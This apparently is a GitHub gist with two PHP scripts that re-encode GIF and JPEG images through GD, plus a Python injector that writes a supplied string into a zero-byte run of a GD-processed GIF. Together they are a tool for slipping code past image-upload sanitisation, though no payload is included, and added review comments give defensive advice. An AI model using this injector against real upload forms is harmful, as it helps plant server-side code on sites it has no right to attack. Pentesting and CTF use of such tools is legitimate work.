@asdqwe3124
Last active October 8, 2023 03:27
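<?php
// Usage: php gd-gif.php image.gif gd-image.gif
//
// Decodes the input GIF with GD and writes the decoded image back out as a
// new GIF, i.e. one GD re-encoding pass over the file.
//
// NOTE(review): a file that survives this round trip is not thereby proven
// free of embedded data. An upload pipeline that relies on a GD re-encode
// should still store the result where it is only ever served as static
// content and never interpreted as code.
if (count($argv) < 3) {
    fwrite(STDERR, "usage: php gd-gif.php image.gif gd-image.gif\n");
    exit(1);
}

// imagecreatefromgif() returns false when the file is missing or is not a
// decodable GIF; stop here instead of passing false on to imagegif().
$gif = imagecreatefromgif($argv[1]);
if ($gif === false) {
    fwrite(STDERR, "could not decode GIF: {$argv[1]}\n");
    exit(1);
}

// imagegif() returns false when the output cannot be written.
$written = imagegif($gif, $argv[2]);
imagedestroy($gif);

if (!$written) {
    fwrite(STDERR, "could not write GIF: {$argv[2]}\n");
    exit(1);
}
?>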
#!/usr/bin/python
#modified from https://github.com/dlegs/php-jpeg-injector/blob/master/gd-jpeg.py
import sys
import binascii
def main():
# Command-line entry point. Expects exactly three arguments: the path of a
# GIF, the string to embed, and the output path. It asks get_loc() for the
# offset of a zero-byte run as long as that string, then calls
# inject_payload() to write the modified copy.
# NOTE(review): the usage text names the first argument <gd-gif>, presumably
# a GIF that has already been through the gd-gif.php re-encode step; confirm.
# NOTE(review): the leading indentation of this listing was lost when the
# page was extracted; the statements down to the next `def` are this
# function's body.
if len(sys.argv) != 4:
print("USAGE: <gd-gif> <payload> <output_name>")
# sys.exit() with no argument exits with status 0, so a calling script
# cannot tell a usage error from success.
sys.exit()
gif = sys.argv[1]
payload = sys.argv[2]
output = sys.argv[3]
# Length in characters of the command-line string; get_loc() searches for
# that many zero bytes.
payload_len = len(payload)
loc = get_loc(gif, payload_len)
inject_payload(gif, loc, payload, output)
def get_loc(gif,payload_len):
# Return the offset of the first run of `payload_len` consecutive zero bytes
# in the file at `gif`; exit the process when no such run exists.
#
# Hex text for `payload_len` zero bytes ('00' repeated); it is converted to
# raw bytes by unhexlify() below.
empty_space = payload_len*'00'
# NOTE(review): this line is written as a Python 2 print statement. Under
# Python 3, print() returns None and the `%` that follows raises TypeError.
print("Searching for %s bytes empty space") % (payload_len)
# The whole file is read into memory; the handle is closed by hand, so it
# stays open if read() or find() raises.
f = open(gif, 'rb')
contents = f.read()
# find() returns the first matching offset, or -1 when there is no match.
loc = contents.find(binascii.unhexlify(empty_space))
f.close()
if loc != -1:
print("Found empty space.")
return loc
else:
print("Can't found enough empty space, try other .gif image. Exiting.")
# Exits with status 0 (no argument given), so the failure is only visible
# in the printed message.
sys.exit()
def inject_payload(gif, loc, payload, output):
# Write a copy of the file at `gif` to `output` in which the len(payload)
# bytes starting at offset `loc` are replaced by `payload`, with one newline
# appended at the end. The output is therefore one byte longer than the input.
#
# NOTE(review): from a defender's point of view the output is still a file
# that parses as an image, so checking that an upload decodes (or re-encoding
# it) is not by itself evidence that it carries no embedded text. Uploaded
# files should also be stored and served so that they are never interpreted
# as code.
#
# bin_payload is computed but never used afterwards. The conversion still
# runs, so a payload that hexlify()/int() cannot handle raises here.
bin_payload = bin(int(binascii.hexlify(payload),16))
# Both handles are opened and closed by hand; if anything between open() and
# close() raises, they stay open until the interpreter reclaims them.
f = open(gif, 'rb')
fo = open(output, 'wb')
print("Injecting payload...")
contents = f.read()
pre_payload = contents[:loc]
# Skips exactly len(payload) bytes of the original, so the payload overwrites
# the region rather than being inserted into it.
post_payload = contents[loc + len(payload):]
# NOTE(review): concatenating file contents with the command-line string and
# a '\n' literal relies on Python 2, where both are `str`; under Python 3
# this mixes bytes and str.
fo.write(pre_payload + payload + post_payload + '\n')
print("Payload written.")
f.close()
fo.close()
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
main()
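<?php
// Usage: php gd.php image.jpg gd-image.jpg 0-100[optional]
//
// Decodes the input JPEG with GD and re-encodes it to the output path,
// optionally at a caller-chosen quality.
//
// NOTE(review): a file that survives this round trip is not thereby proven
// free of embedded data. An upload pipeline that relies on a GD re-encode
// should still store the result where it is only ever served as static
// content and never interpreted as code.
if (count($argv) < 3) {
    fwrite(STDERR, "usage: php gd.php image.jpg gd-image.jpg 0-100[optional]\n");
    exit(1);
}

// Quality is optional. -1 is imagejpeg()'s own default value; an explicit
// value must be an integer from -1 to 100 so that a typo fails here rather
// than inside GD.
$q = -1;
if (isset($argv[3])) {
    $q = filter_var(
        $argv[3],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => -1, 'max_range' => 100]]
    );
    if ($q === false) {
        fwrite(STDERR, "quality must be an integer from 0 to 100\n");
        exit(1);
    }
}

// imagecreatefromjpeg() returns false when the file is missing or is not a
// decodable JPEG; stop here instead of passing false on to imagejpeg().
$jpg = imagecreatefromjpeg($argv[1]);
if ($jpg === false) {
    fwrite(STDERR, "could not decode JPEG: {$argv[1]}\n");
    exit(1);
}

//imagejpeg ( resource $image [, mixed $to = NULL [, int $quality = -1 ]] ) : bool
$written = imagejpeg($jpg, $argv[2], $q);
imagedestroy($jpg);

if (!$written) {
    fwrite(STDERR, "could not write JPEG: {$argv[2]}\n");
    exit(1);
}
?>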